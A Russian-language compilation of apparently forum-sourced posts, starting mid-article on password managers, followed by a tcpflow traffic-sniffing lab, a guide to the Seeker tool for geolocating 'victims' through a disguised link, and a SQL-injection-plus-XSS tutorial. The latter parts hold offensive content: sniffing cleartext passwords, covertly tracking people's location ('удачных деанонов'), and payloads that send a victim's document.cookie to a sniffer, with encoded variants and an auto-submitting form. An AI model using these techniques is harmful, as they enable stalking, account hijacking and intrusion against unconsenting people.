пришедшей на устройство SMS. Поэтому для счетов, на которых хранятся действительно серьёзные суммы, лучше не проводить платежи онлайн и не устанавливать мобильные приложения. Главное — ключи и пароли! Подход пользователя: один пароль для всех учётных записей и стикеры на рабочем столе Давайте обсудим самый важный вопрос: как помочь пользователю запоминать пароли от всех этих сервисов и криптографических утилит? Считается, что ввод ограничений на состав пароля решает проблему безопасности, и администраторы стремятся сделать пароли длинными, содержащими и буквы, и цифры, и символы, а также исключить из них реальные слова, которые можно найти в словарях, а также требуют менять их, скажем, каждые три месяца. Но кто сможет в реальности запомнить несколько каламбуров из десятка не связанных между собой символов? Пользователи всегда борются против сложностей, которые мешают им работать. Поэтому на рабочих местах появляются жёлтенькие стикеры с теми самыми сложными паролями, а в доступной и незащищённой электронной почте оказываются все ключи шифрования, которые человек просто не хочет и не может запомнить. Если же предоставить пользователю право самостоятельно устанавливать пароли на разные сервисы (а это неизбежно происходит, если речь идёт не о корпоративных учётных записях), то в большинстве случаев люди устанавливают вариации одного и того же пароля в разных системах. Например, это может быть PASSWORDgmail, PASSWORDfacebook, PASSWORDyandex и так далее. А после регистрации на каком-то сомнительном ресурсе с паролем PASSWORDroga-i-kopita все пароли могут быть легко взломаны злоумышленниками. С другой стороны, шифрование только подливает масла в огонь. Ведь при утере ключа шифрования вы также теряете доступ ко всем зашифрованным данным. А если ключ хранится в электронной почте, то риск его кражи сводит на нет все плюсы шифрования. И здесь обращаться в службу поддержки бесполезно. Стойкие криптографические алгоритмы не позволят вам получить доступ к своим же данным. Решение проблемы — программы для хранения паролей Хорошим решением могут стать программы для хранения паролей. Например, вы можете предложить пользователям установить dashlane, sticky password или любую другую утилиту-менеджер паролей, защитив их одной фразой. Очень важно, что здесь речь идёт не про мастер-пароль, который открывает доступ ко всем вашим учётным записям, а именно про фразу, которая должна быть достаточно длинной и известной только вам. Утилита просто хранит файл с паролями и ключами доступа в зашифрованном виде, а секретная фраза при помощи различных алгоритмов позволяет получить ключ расшифровки. Последний штрих этой концепции безопасности — защита зашифрованного файла с паролями, потерять который нельзя ни в коем случае. Поэтому для утилит данного типа всегда настраивают автоматизированные алгоритмы резервного копирования в облако. Даже при полной утрате устройства, вы сможете в любой момент восстановить файл и снова получить доступ ко всем своим хранилищам, учётным записям и сервисам. Инкрементальное обновление данных в современном ПО для резервного копирования позволяет загружать обновление файла с паролями на сервер сразу после добавления новых учётных записей и гарантировать сохранность и конфиденциальность вашего доступа ко всем категориям данных, которые вы решили защитить паролем — от файлов и электронной почты до корпоративных сервисов и скрытых виртуальных машин. Заключение Чтобы от шифрования действительно был толк, нужно продумать систему так, чтобы пользователям было удобно с ней работать. Поэтому конкретные криптографические утилиты для защиты почты или файлов необходимо дополнять надёжными менеджерами паролей, а также средствами облачного резервного копирования, чтобы не потерять всю информацию. Если сотрудникам будет понятно, как все это использовать, а шифрование будет происходить прозрачно и без технических сложностей, тогда криптографическая защита информации действительно будет работоспособной.
  13. Tcpflow - это утилита, которая захватывает данные, передаваемые как часть TCP-соединений (потоков),сохраняя удобные для анализа и отладки протокола данные. Главное отличие tcpflow от других нтсрументов — это фактический захват реальных данных и последующий сбром их в файл. Затем его можно использовать для других целей анализа. Еще одним преимуществом данной программы является эффективное восстановление сломанных пакетов, что немаловажно. Кроме того, tcpflow имеет множество параметров фильтра: Мы можем отфильтровать захват множеством разных способов. Обычно большинство способов сниффинга включают arp-отравление в качестве первого этапа. Тем не менее, tcpflow захватывает почти все данные без активного отравления подсети или сети. Опции утилиты: Syntax: tcpflow [options] [expression] [host] -b: max number of bytes per flow to save -c: console print only (don't create files) -C: console print only, but without the display of source/dest header -d: debug level; default is 1 -e: output each flow in alternating colors(Blue=client to server;Red=server to client;Green=Unknown) -f: maximum number of file descriptors to use -h: print this help message -i: network interface on which to listen -p: don't use promiscuous mode -r: read packets from tcpdump output file -s: strip non-printable characters (change to '.') -v: verbose operation equivalent to -d 10 Источник опций: https://github.com/simsong/tcpflow Лабораторная работа 1: Основы Эта лаборатория демонстрирует базовую консоль-протоколирование данных и от целевого компьютера. Здесь наш целевой IP-адрес — 192.168.0.100. Кроме того, domain / hostnames приемлемы. command tcpflow -ce host 192.168.0.100<your target here> Примечание. Если вы используете какой-либо другой интерфейс, обязательно укажите -i и соответствующий интерфейс. Предположим, нам нужен весь HTTP-трафик в сети, command: tcpflow -ce port 80 Мы также можем использовать логические сравнения во время захвата. Например, мы хотим видеть весь HTTP & https-трафик от & до хоста, мы выдаем следующую команду: Command: tcpflow -ce host 192.168.0.100<your target> and port 80 or port 443. Здесь команда выбирает хост «192.168.0.100», выполняет операцию «and» для условия: порт 80 «or» порт 443. В частности, трафик HTTP или https с и на хост (192.168.0.100) фиксируется и отображается. Помните, что HTTP работает на порту 80 и https на 443. Лабораторная работа 2: Дамп данных в локальную папку Эта лабораторка демонстрирует сброс всех данных между объектом. Tcpflow дампит все данные в текущую рабочую папку (выполните команду: pwd, чтобы узнать текущий текущий рабочий каталог). Итак, давайте создадим папку для сброса данных, а затем выполните tcpflow. Шаг 1. Создайте новый каталог Command: mkdir tcpflowdata<your name here> Шаг 2: переход в новый каталог Command: cd tcpflowdata<yourname> Шаг 3: выполните tcpflow Command: tcpflow host 192.168.0.103<your target here> Вы можете увидеть все файлы, которые выгрузили в каталог с хоста, который мы указали в качестве начала имени файла. Преимущество этого инструмента заключается в том, что любые четкие текстовые данные, такие как HTTP-аутентификация или telnet-соединение или smb-аутентификация и т. д., будут видны вам. Как только вы дампите весь трафик, вы можете просмотреть его позже и проанализировать его в более поздний момент времени и еще много чего. Вы можете загрузить его в Wireshark или любой инструмент, например xplico для форензики. Попробуйте сами, запустите tcpflow и перейдите на любой HTTP-сайт (а не в facebook или twitter), возможно, на свою локальную страницу входа в маршрутизатор. Дайте пароль и проанализируйте вывод tcpflow.
  14. Хочу представить тебе воистину выносящий софт, а именно скрипт под названием Seeker. Погнали. Все действия можно проводить в терминале Kali Linux, или же в моем любимом Термукс(скачайте с Google Play) Я буду показывать все на последнем, алгоритм действий никак не отличается от компа. Что нам нужно? Termux 2. Ngrok. Хмм, что это за зверь такой? Вкратце, это утилита делает твой локальный трафик глобальным. Не думаю, что тебе особо нужно знать как с ней обращаться, просто ее нужно установить для нормальной работы скрипта. Вбейте на Ютуб такое словосочетание: "Установка ngrok на Kali Linux/Termux" Просто повторяйте все действия из видео, и будет вам счастье. Установка. Прописываем в терминале следующее: apt-get update apt-get upgrade pkg install python3 pkg install git git clone https://github.com/thewhiteh4t/seeker ls cd seeker/termux(это для Термукс) cd seeker(вот так для компа) chmod 777 install.sh ./install.sh После этих команд откройте новую сессию, а потом при каждом запуске вводите это:(если вы через Термукс) А если вы через комп, то вот так: Что дальше? Дальше запускаете инструмент, а там такая картина: Да-да, опять некрасивый урл(который можно сократить), а кто из нынешних юзеров на него смотрит? Разве что прошареные. В любом случае, тут все будет зависеть от вашего СИ. У меня жертвы и по "чистой" ссылке переходили. Собсна, нам нужно отправить этот урл, давайте перейдем на него: Эта кнопка прям хочет, чтоб на нее нажали, после нажатия появляется это: Если человек нажал "разрешить", то у нас тут такая картина: Нормально, да?) Инфа об устройстве, широта, долгота, скорость, высота, и ссылка на Гугл мапс После многих тестов я могу уверить, что эта штука даст местоположение с точностью от 10-ти до 30-ти метров(если человек не использует софт по подмене местоположения). Если у вас ещё есть сомнения, то спешу их развеять тем, что эта ссылка работает даже через включенный у жертвы VPN. Даже сли даже человек не нажал "разрешить", то в любом случае инфа о его устройстве будет у нас. Профит уже зависит от вашего СИ. Удачных деанонов.
  15. Что такое SiXSS? SiXSS (Sql Injection Сross Site Scripting) — это «Межсайтовый скриптинг при наличии SQL-инъекции» — тип атаки на уязвимые интерактивные информационные системы в вебе. Внедрение выполняемых на клиентском компьютере вредоносных скриптов в выдаваемую системой страницу посредством внедрения кода в SQL-инъекцию. Как правило, данная уязвимость возникает на стороне клиента, при наличии вывода принтабельных полей посредством выполнения SQL-инъекции. Данная атака может обеспечить доступ к информации на сервере, дать возможность выполнять определенные команды, украсть COOKIES пользователя и многое другое. Она представляет собой совместное использование таких атак как SQL-инъекция и XSS в одной атаке. Используется при наличии SQL-уязвимости в php-сценарии в случае отсутствия вывода нужной информации из базы данных и при наличии вывода принтабельных полей из таблицы базы данных. Пример 1. Предположим, что Magic_quotes отключен. Тогда, http://mysite.com/index.php?id=1+union+select+1,2,'<script>alert('SiXSS');</script>',4,5/* Команда «UNION SELECT», даёт возможность выводить в браузер произвольный текст. Благодаря этому, мы и можем успешно провести уязвимость. В начале, нужно подобрать количество полей, т.к. количество извлекаемых из БД полей должно быть равно количеству извлекаемых полей после UNION. Если код сработает, то составляем необходимый нам xss вектор. http://mysite.com/index.php?id=1+union+select+1,2,'<script>document.location="снифер"+document.cookie;</script>',4,5/* Пример 2. А что если у Magic_quotes включен? Мы будем использовать «0xXX». Это HEX вместо обычного текста. Переводить текст мы будем в MySQL. select HEX('<script>alert("SiXSS");</script>'); Выведет, что-то подобие вот такого: 3C7363726970743E616C6572742822536958535322293B3C2F7363726970743E Вводим в браузер примерно так: http://mysite.com/index.php?id=1+union+select+1,2, 3C7363726970743E616C6572742822536958535322293B3C2F7363726970743E Выведет сообщение с текстом: SiXSS. Пример 3. Здесь мы будем использовать char. Кодируем в char: <script>alert("SiXSS");</script> Вводим в браузер: http://mysite.com/index.php?id=1+union+select+1,2,char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,92,39,120,115,115,92,39,41,59,60,47,115,99,114,105,112,116,62),4,5/* Вывод будет аналогичным. Пример 4. Мы можем сделать беспалевный скрипт с SiXSS уязвимостью. Создаем html файл. Пусть будет: «test.html». Пишем html форму: <html> <body onload="send.submit();"> <form name=send action=sixss.php method=post> <input type=hidden name=xss value="<script>alert(/SiXSS/)</script>"> </form> </body> </html> Создаем php файл. Называем: «xss.php» Код: <? echo $_POST['xss']; ?> Заливаем на бесплатный хостинг. И кидаем жертве. http://mysite.com/test.html Готово.